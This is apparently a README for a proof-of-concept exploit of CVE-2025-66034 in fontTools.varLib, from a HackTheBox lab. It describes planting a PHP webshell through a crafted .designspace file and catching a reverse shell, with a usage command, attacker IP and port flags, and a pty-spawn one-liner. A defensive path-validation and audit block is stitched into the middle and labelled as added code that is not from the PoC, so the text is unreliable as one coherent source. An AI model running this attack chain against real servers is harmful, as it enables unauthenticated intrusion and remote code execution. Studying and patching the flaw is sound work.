## https://sploitus.com/exploit?id=3D0313B1-DD97-5AE1-AA14-E2F7D9DB8A59
# CVE-2025-66034 — fontTools varLib Arbitrary File Write → RCE

> **PoC exploit for an Arbitrary File Write + XML Injection vulnerability in `fontTools.varLib`**
> Tested on HackTheBox — VarIaType

---

## Vulnerability

`fontTools.varLib` processes `.designspace` XML files to build variable fonts. Two weaknesses combine to achieve pre-auth RCE:

| # | Primitive | Detail |
|---|-----------|--------|
| 1 | **XML Injection via CDATA split** | Attacker-controlled content inside `` is written verbatim into the output font file body, allowing arbitrary data injection |
| 2 | **Arbitrary File Write via `os.path.join()` bypass** | The `filename` attribute of `` accepts an absolute path. When passed to `os.path.join()`, it discards the intended output directory and writes to any attacker-specified filesystem path |

Chaining both primitives allows writing a PHP webshell to a web-accessible path, achieving unauthenticated Remote Code Execution.
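The file-write primitive rests on a standard library behaviour that is easy to miss: `os.path.join()` discards every earlier component as soon as a later one is absolute. The following is an added example, not code from this PoC or from fontTools, showing the vulnerable join beside a hardened resolver and a small audit that flags any `filename` attribute in a designspace document which would resolve outside the intended output directory. The sample designspace XML and the paths in it are constructed for the example; the `<source>`/`<instance>` element names follow the designspace format but are an assumption here, since the audit walks every element carrying a `filename` attribute regardless of tag.

```python
import os
import xml.etree.ElementTree as ET


def naive_output_path(output_dir, filename):
    """Vulnerable pattern: a plain os.path.join of a trusted directory and an
    untrusted filename. If filename is absolute, os.path.join returns it
    unchanged and output_dir is silently dropped."""
    return os.path.join(output_dir, filename)


def safe_output_path(output_dir, filename):
    """Resolve filename under output_dir and refuse anything that escapes it.

    realpath() collapses '..' segments and symlinks, so the containment check
    is made on the final path rather than on the attacker-supplied string.
    """
    base = os.path.realpath(output_dir)
    candidate = os.path.realpath(os.path.join(base, filename))
    # Require a strict child of base: rejects absolute paths, '..' traversal
    # and the empty filename (which would resolve to base itself).
    if not candidate.startswith(base + os.sep):
        raise ValueError(f"filename {filename!r} resolves outside {base}")
    return candidate


def is_safe_filename(output_dir, filename):
    """Boolean wrapper around safe_output_path for use in filters and tests."""
    try:
        safe_output_path(output_dir, filename)
        return True
    except ValueError:
        return False


def audit_designspace(xml_text, output_dir):
    """Return (tag, filename) for every element whose filename attribute would
    be written outside output_dir if joined naively. Parsing uses the stdlib
    ElementTree so the audit can run before the file ever reaches varLib."""
    root = ET.fromstring(xml_text)
    findings = []
    for element in root.iter():
        filename = element.get("filename")
        if filename is None:
            continue
        if not is_safe_filename(output_dir, filename):
            findings.append((element.tag, filename))
    return findings


# Constructed sample: two legitimate masters, one benign instance and two
# instances whose filename attributes escape the output directory.
DESIGNSPACE_SAMPLE = """<designspace format="5.0">
  <axes>
    <axis tag="wght" name="Weight" minimum="300" maximum="400" default="400"/>
  </axes>
  <sources>
    <source filename="source-light.ttf" name="Light">
      <location><dimension name="Weight" xvalue="300"/></location>
    </source>
    <source filename="source-regular.ttf" name="Regular">
      <location><dimension name="Weight" xvalue="400"/></location>
    </source>
  </sources>
  <instances>
    <instance filename="instances/Medium.ttf" name="Medium">
      <location><dimension name="Weight" xvalue="350"/></location>
    </instance>
    <instance filename="/var/www/html/files/not-a-font.php" name="Absolute">
      <location><dimension name="Weight" xvalue="350"/></location>
    </instance>
    <instance filename="../../escape.ttf" name="Traversal">
      <location><dimension name="Weight" xvalue="350"/></location>
    </instance>
  </instances>
</designspace>
"""

# Constructed output directory; it does not need to exist for the checks.
OUTPUT_DIR = "/srv/fontbuild/out"


if __name__ == "__main__":
    print("naive join:", naive_output_path(OUTPUT_DIR, "/var/www/html/files/not-a-font.php"))
    for tag, filename in audit_designspace(DESIGNSPACE_SAMPLE, OUTPUT_DIR):
        print(f"REJECT <{tag} filename={filename!r}>")
```

Running the audit before handing a user-supplied designspace to `fontTools.varLib` is the cheapest mitigation available to an application that exposes a font-processing endpoint: the two hostile instances are rejected while the relative `instances/Medium.ttf` passes. The same `safe_output_path` check belongs wherever the service itself computes output locations from file contents.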

---

## Usage

```bash
python3 font_varlib.py \
  --ip  \
  --port  \
  --upload http://target.htb/tools/variable-font-generator/process \
  --webroot /var/www/portal.target.htb/public/files \
  --shell http://portal.target.htb/files
```

### Options

| Flag | Description |
|------|-------------|
| `--ip` | Attacker IP for the reverse shell callback |
| `--port` | Listener port |
| `--upload` | Full URL of the font processing endpoint (POST) |
| `--webroot` | Server-side absolute path that maps to a web-accessible directory |
| `--shell` | Base URL under which the webshell will be accessible |
| `--no-listen` | Skip the auto-listener and print manual commands instead |
| `--pwncat` | Use `pwncat-cs` instead of `nc` (preferred if available) |

### Dependencies

```bash
pip install requests fonttools
```

---

## How It Works

1. **Master fonts** — Two minimal `.ttf` files (`source-light.ttf`, `source-regular.ttf`) are generated using `fontTools.FontBuilder` as the masters required by the designspace
2. **Malicious `.designspace`** — A crafted XML file is built with:
   - PHP webshell injected via a CDATA split inside ``
   - Absolute write path set as the `filename` of ``, bypassing `output_dir` via `os.path.join()`
3. **Upload** — The `.designspace` + master fonts are POSTed to the processing endpoint
4. **Trigger** — The planted `.php` file is requested, executing the reverse shell payload
5. **TTY upgrade** — On connection, the script automatically spawns a PTY via `python3 -c 'import pty; pty.spawn("/bin/bash")'` and sets `TERM` + `stty` for a fully interactive shell

---

## Disclosure

| Field | |
|-------|-|
| CVE | CVE-2025-66034 |
| Affected component | `fontTools.varLib` |
| Impact | Unauthenticated Arbitrary File Write → Remote Code Execution |
| Context | Web application exposing font processing endpoint |

---

## Legal

This tool is intended for **authorized penetration testing and CTF use only**.
Do not run against systems you do not own or have explicit written permission to test.

---

*by [4nuxd](https://github.com/4nuxd/CVE-2025-66034)*